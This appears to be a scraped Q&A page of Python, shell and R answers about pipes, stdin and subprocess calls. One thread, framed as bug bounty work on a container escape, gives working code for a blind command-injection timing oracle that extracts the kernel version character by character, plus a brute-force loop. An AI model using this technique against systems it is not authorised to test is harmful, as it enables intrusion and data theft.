How to run bash pipe operators from Python - python-3.x

I'm trying to execute:
actual = subprocess.run(['echo 123 | ./ft_ssl md5 -s ' + data + ' -p'], stdout=subprocess.PIPE)
actual = actual.stdout.decode('utf-8')
and afterwards the variable actual equals "123 | ./ft_ssl md5 -s <data> -p\n".
Python only runs echo on the entire string and ignores the | operator.
What do I have to do to run two commands joined by a pipe?

You can avoid echo altogether: the pipe can be simulated here by passing echo's argument to the stdin of the ./ft_ssl call.
actual = subprocess.Popen(['./ft_ssl', 'md5', '-s', data, '-p'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
output, _ = actual.communicate(b'123')  # communicate() returns a (stdout, stderr) tuple
See the docs for more details about communicate().
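For completeness, here is a minimal sketch of both approaches, assuming ./ft_ssl is the asker's binary and data holds an ordinary string (the shell=True variant is an alternative, not what the answer above recommends):
import shlex
import subprocess
data = "some-string"  # hypothetical stand-in for the asker's variable
# Preferred: no shell, no echo; feed b'123' straight to ./ft_ssl's stdin.
proc = subprocess.Popen(
    ["./ft_ssl", "md5", "-s", data, "-p"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
)
stdout, _ = proc.communicate(b"123")
actual = stdout.decode("utf-8")
# Alternative: keep the pipeline, but hand one string to a shell.
# shlex.quote() guards against word-splitting and injection via data.
result = subprocess.run(
    "echo 123 | ./ft_ssl md5 -s " + shlex.quote(data) + " -p",
    shell=True,
    stdout=subprocess.PIPE,
)
actual = result.stdout.decode("utf-8")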

Related

Python3 how to pass binary data to stdin when using subprocess.run()?

So how do I pass binary data via stdin to an executable command that I want to run using subprocess.run()?
The documentation is pretty vague about using stdin to pass data to an external executable. I'm working on a Linux machine with Python 3 and I want to invoke dd of=/somefile.data bs=32 (which takes its input from stdin, if I understand the man page correctly). I have the binary data in a bytearray that I want to pass to the command through stdin, so that I do not have to write it to a temporary file and invoke dd using that file as input.
My requirement is simply to pass the data I have in a bytearray to the dd command to be written to disk. What is the correct way to achieve this using subprocess.run() and stdin?
Edit: I meant something like the following:
ba = bytearray(b"some bytes here")
#Run the dd command and pass the data from ba variable to its stdin
You can pass the output of one command to another by calling Popen directly:
import subprocess
from subprocess import Popen
from shlex import split as sh_split
file_cmd1 = <your dd command>
file_cmd2 = <command you want to pass dd output to>
proc1 = Popen(sh_split(file_cmd1), stdout=subprocess.PIPE)
proc2 = Popen(sh_split(file_cmd2), stdin=proc1.stdout, stdout=subprocess.PIPE)
proc1.stdout.close()  # let proc1 receive SIGPIPE if proc2 exits first
This, as far as I know, will work just fine on byte output from command 1.
In your case, when you just want to pass data to the stdin of the process, what you most likely want is the following:
data = bytearray(b"Some data here")
p = subprocess.Popen(sh_split("dd of=/../../somefile.data bs=32"),
                     stdin=subprocess.PIPE, stderr=subprocess.PIPE)
out = p.communicate(input=bytes(data))[1]  # dd reports its statistics on stderr
print(out.decode())  # prints the transfer summary from dd
Specifically for stdin to subprocess.run(), as asked by the OP, use the input argument as follows:
#!/usr/bin/python3
import subprocess
data = bytes("Hello, world!", "ascii")
p = subprocess.run(
    ["cat", "-"],  # the "-" means 'cat from stdin'
    input=data,
    # stdin=...  <-- don't pass stdin= together with input=
    stdout=subprocess.PIPE,
    stderr=subprocess.PIPE,
)
print(p.stdout.decode("ascii"))
print(p.returncode)
# Hello, world!
# 0
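Applying the same input= pattern to the OP's dd case, a minimal sketch (the output path here is illustrative, not the OP's):
import subprocess
ba = bytearray(b"some bytes here")
# dd writes its transfer statistics to stderr, not stdout.
p = subprocess.run(
    ["dd", "of=/tmp/somefile.data", "bs=32"],
    input=bytes(ba),
    stderr=subprocess.PIPE,
)
print(p.stderr.decode())
print(p.returncode)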

How can I inject strings into shell scripts when generating them in Python?

I have a script that I am using for a bug bounty program to run blind code/command injection.
I have already made the application sleep for 60 seconds based on user id boolean comparisons, so I know the injection point is there.
What I am trying to do now is run shell commands, set their output to a shell variable, and blindly test it character by character, true or false.
The issue I am having is that the variables I am setting are not being picked up by the host. I am testing this on my local machine (Kali) at the moment.
When I print the output of the commands, I can see the literal $char, for example, rather than the value of the shell variable char.
1: kernel_version=$(uname -r);
2: char=$(echo $kernel_version | head -c 1 | tail -c 1);
3: if [[ $char == M ]]; then sleep 60 ; exit; fi
How can I correct the below code so that variable are set and picked up correctly?
def bash_command(self, char, position):
    cmd1 = "kernel_version=$(uname -r); "
    cmd2 = f"char=$(echo $kernel_version | head -c {position} | tail -c 1); "
    op = '==' if char in self.letters + self.numbers else '-eq'
    cmd3 = f"if [[ $char {op} {char} ]]; then sleep 60 ; exit; fi"
    print("1: " + cmd1)
    print("2: " + cmd2)
    print("3: " + cmd3)
    return cmd1 + cmd2 + cmd3
Full Code:
https://raw.githubusercontent.com/richardcurteis/BugBountyPrograms/master/qc_container_escape.py
To sum up the question: You have a sandbox escape that lets you invoke a shell via os.popen() and determine the time taken by the call (but not the return value), and you want to extract /proc/version by guess-and-check.
The most immediate bug in your original code is that it depends on bash-only syntax, whereas os.popen() uses /bin/sh, which isn't guaranteed to support it.
The other thing that was... highly questionable as a practice (especially as a security researcher!) was the generation of code via string concatenation without any explicit escaping. C'mon -- we, as an industry, can do better than that. Even though os.popen() is a fairly limited channel if you can't set environment variables, one can use shlex.quote() to set values safely, and separate the program being executed from the process setup that precedes it.
shell_cmd = '''
position=$1
test_char=$2
kernel_version=$(uname -r)
found_char=$(printf '%s\n' "$kernel_version" | head -c "$position" | tail -c 1)
[ "$test_char" = "$found_char" ] && sleep 2
'''
import os, shlex, time

def run_with_args(script, args):
    args_str = ' '.join([shlex.quote(str(arg)) for arg in args])
    set_args_cmd = 'set -- ' + args_str + ';'
    # without read(), we wouldn't wait for execution to finish, and couldn't see timing
    os.popen(set_args_cmd + script).read()

def check_char(char, pos):
    start_time = time.time()
    run_with_args(shell_cmd, [pos+1, char])  # use zero-based offsets like sane people
    end_time = time.time()
    return end_time - start_time > 1
...whereafter, on a system with a 5.0 kernel, check_char('5', 0) will return True, but check_char('4', 0) will return False.
(Using timing as a channel assumes that there are countermeasures you're overcoming that prevent you from simply reading data from the FIFO that os.popen() returns; of course, if you can possibly do that instead, you should!)
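To show how the oracle composes, here is a hypothetical driver loop that brute-forces the version string one position at a time; the alphabet and length are assumptions, not part of the original exploit:
import string
ALPHABET = string.ascii_letters + string.digits + ".-_"
def extract(length):
    recovered = ""
    for pos in range(length):
        for candidate in ALPHABET:
            if check_char(candidate, pos):  # timing oracle from above
                recovered += candidate
                break
        else:
            break  # no candidate matched this position; stop early
    return recovered
print(extract(8))  # recovers e.g. "5.0.0-ka" one character at a time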

Not getting grep result using popen with cat and multiple process pipes

I am trying to get grep to work using pipes and subprocess. I've double-checked the cat and I know it's working, but for some reason grep isn't returning anything, even though the same command works just fine in the terminal. I'm wondering whether I have constructed the command correctly, as it doesn't give the desired output, and I can't figure out why.
I'm trying to retrieve a few specific lines of data from a file I've already retrieved from a server. I've been having a lot of issues with getting grep to work and perhaps I do not simply understand how it works.
p1 = subprocess.Popen(["cat", "result.txt"], stdout=subprocess.PIPE,
                      stderr=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "tshaper"], stdin=p1.stdout,
                      stdout=subprocess.PIPE)
o = p1.communicate()
print(o)
p1.stdout.close()
out, err = p2.communicate()
print(out)
The output when I run the command (cat result.txt | grep "tshaper") in the terminal:
tshaper.1.devname=eth0
tshaper.1.input.burst=0
tshaper.1.input.rate=25000
tshaper.1.input.status=enabled
tshaper.1.output.burst=0
tshaper.1.output.rate=25000
tshaper.1.output.status=enabled
tshaper.1.status=enabled
tshaper.status=disabled
My results running the command in the script:
(b'', b'')
where the tuple contains the stdout and stderr, respectively, of the p2 process.
EDIT:
Based on the Popen documentation, I changed the p1 subprocess statement to
p1 = subprocess.Popen(['result.txt', 'cat'], shell=True, stdout=subprocess.PIPE,
                      stderr=subprocess.PIPE, cwd=os.getcwd())
While I was able to get output in stderr, it didn't really change anything:
(b'', b'cat: 1: cat: result.txt: not found\n')
FYI: you got the error (b'', b'cat: 1: cat: result.txt: not found\n') because you reversed the sequence of the command and its argument in your Popen call: ['result.txt', 'cat'].
I have written a working solution which produces the expected output.
Python 3.6.6 was used for it.
result.txt file:
I have changed some lines to test the grep command.
tshaper.1.devname=eth0
ashaper.1.input.burst=0
bshaper.1.input.rate=25000
tshaper.1.input.status=enabled
tshaper.1.output.burst=0
cshaper.1.output.rate=25000
tshaper.1.output.status=enabled
dshaper.1.status=enabled
tshaper.status=disabled
Code:
I added readable printing, but it is not necessary if you only need the output of grep (a bytes-like object in Python 3).
import subprocess
p1 = subprocess.Popen(['cat', 'result.txt'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p2 = subprocess.check_output(["grep", "tshaper"], stdin=p1.stdout)
print(p2.decode("utf-8"))  # grep's output is already newline-separated
Output:
You can see that grep filters the lines from the cat command, as expected.
>>> python3 test.py
tshaper.1.devname=eth0
tshaper.1.input.status=enabled
tshaper.1.output.burst=0
tshaper.1.output.status=enabled
tshaper.status=disabled
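For reference, the asker's original two-Popen approach also works once only p2 is communicated with; calling p1.communicate() first drains the pipe before grep can read anything. A minimal sketch:
import subprocess
p1 = subprocess.Popen(["cat", "result.txt"], stdout=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "tshaper"], stdin=p1.stdout,
                      stdout=subprocess.PIPE)
p1.stdout.close()  # lets p1 receive SIGPIPE if p2 exits first
out, _ = p2.communicate()
print(out.decode("utf-8"))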

How to make R script takes input from pipe and user given parameter

I have the following R script (myscript.r)
#!/usr/bin/env Rscript
dat <- read.table(file('stdin'), sep=" ",header=FALSE)
# do something with dat
# later with user given "param_1"
With that script we can run it the following way;
$ cat data_no_*.txt | ./myscript.r
What I want to do is make the script take an additional parameter from the user:
$ cat data_no_*.txt | ./myscript.r param_1
How should I modify myscript.r to accommodate that?
For very basic usage, have a look at ?commandArgs.
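For instance, a minimal commandArgs() sketch for the script above, assuming a single positional parameter:
#!/usr/bin/env Rscript
args <- commandArgs(trailingOnly = TRUE)  # e.g. c("param_1")
param_1 <- args[1]
dat <- read.table(file("stdin"), sep = " ", header = FALSE)
# do something with dat and param_1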
For more complex usage, two popular packages for command-line argument and option parsing are getopt and optparse. I use them all the time; they get the job done. I also see argparse, argparser, and GetoptLong, but have never used them before. One I missed: Dirk recommended docopt, which does seem very nice and easy to use.
Finally, since you seem to be passing arguments via pipes you might find this OpenRead() function useful for generalizing your code and allowing your arguments to be pipes or files.
I wanted to test docopt so putting it all together, your script could look like this:
#!/usr/bin/env Rscript
## Command-line parsing ##
'usage: my_prog.R [-v -m <msg>] <param> <file_arg>
options:
-v verbose
-m <msg> Message' -> doc
library(docopt)
opts <- docopt(doc)
if (opts$v) print(str(opts))
if (!is.null(opts$m)) cat("MESSAGE: ", opts$m)
## File Read ##
OpenRead <- function(arg) {
    if (arg %in% c("-", "/dev/stdin")) {
        file("stdin", open = "r")
    } else if (grepl("^/dev/fd/", arg)) {
        fifo(arg, open = "r")
    } else {
        file(arg, open = "r")
    }
}
dat.con <- OpenRead(opts$file_arg)
dat <- read.table(dat.con, sep = " ", header = FALSE)
# do something with dat and opts$param
And you can test running:
echo "1 2 3" | ./test.R -v -m HI param_1 -
or
./test.R -v -m HI param_1 some_file.txt
We built littler to support just that via its r executable.
Have a look at its examples; it may fit the bill.

How to write data to existing process's STDIN from external process?

I'm looking for ways to write data to an existing process's STDIN from external processes, and found a similar question, How do you stream data into the STDIN of a program from different local/remote processes in Python?, on Stack Overflow.
In that thread, @Michael says that we can get the file descriptors of an existing process at the path below, and that on Linux we are permitted to write data to them.
/proc/$PID/fd/
So, I've created a simple script, listed below, to test writing data to the script's STDIN (and TTY) from an external process.
#!/usr/bin/env python
import os, sys

def get_ttyname():
    for f in sys.stdin, sys.stdout, sys.stderr:
        if f.isatty():
            return os.ttyname(f.fileno())
    return None

if __name__ == "__main__":
    print("Try commands below")
    print("$ echo 'foobar' > {0}".format(get_ttyname()))
    print("$ echo 'foobar' > /proc/{0}/fd/0".format(os.getpid()))
    print("read :: [" + sys.stdin.readline() + "]")
This test script prints the paths of its TTY and STDIN and then waits for someone to write to its STDIN.
I launched this script and got messages below.
Try commands below
$ echo 'foobar' > /dev/pts/6
$ echo 'foobar' > /proc/3308/fd/0
So, I executed the commands echo 'foobar' > /dev/pts/6 and echo 'foobar' > /proc/3308/fd/0 from another terminal. After executing both commands, the message foobar is displayed twice on the terminal the test script is running on, but that's all: the line print("read :: [" + sys.stdin.readline() + "]") was not executed.
Are there any ways to write data from external processes to an existing process's STDIN (or other file descriptors), i.e. to trigger execution of the line print("read :: [" + sys.stdin.readline() + "]") from other processes?
Your code will not work.
/proc/pid/fd/0 is a link to the /dev/pts/6 file.
$ echo 'foobar' > /dev/pts/6
$ echo 'foobar' > /proc/pid/fd/0
So both commands write to the terminal. The input goes to the terminal, not to the process.
It will work if stdin is initially a pipe.
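You can check what fd 0 currently points at; a quick sketch from Python:
import os
# Prints e.g. '/dev/pts/6' when attached to a terminal, or 'pipe:[123456]'
# when stdin is a pipe.
print(os.readlink("/proc/{0}/fd/0".format(os.getpid())))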
For example, test.py is :
#!/usr/bin/python
import os, sys

if __name__ == "__main__":
    print("Try commands below")
    print("$ echo 'foobar' > /proc/{0}/fd/0".format(os.getpid()))
    while True:
        print("read :: [" + sys.stdin.readline() + "]")
Run this as:
$ (while [ 1 ]; do sleep 1; done) | python test.py
Now, from another terminal, write something to /proc/pid/fd/0 and it will reach test.py.
I want to leave here an example I found useful. It's a slight modification of the while true trick above that failed intermittently on my machine.
# pipe cat to your long running process
( cat ) | ./your_server &
server_pid=$!
# send an echo to your cat process; this will close cat and, in my hypothetical case, the server too
echo "quit" > "/proc/$server_pid/fd/0"  # plain echo appends the newline itself
It was helpful to me because for particular reasons I couldn't use mkfifo, which is perfect for this scenario.
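The same trick can be driven from Python: start the target with its stdin on a pipe, and on Linux /proc/<pid>/fd/0 then refers to that pipe, so an external writer reaches the process instead of the terminal. A minimal sketch (./your_server is hypothetical):
import subprocess
# Start the target with stdin on a pipe rather than the TTY.
proc = subprocess.Popen(["./your_server"], stdin=subprocess.PIPE)
print("From another shell, run:")
print("  echo quit > /proc/{0}/fd/0".format(proc.pid))
proc.wait()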
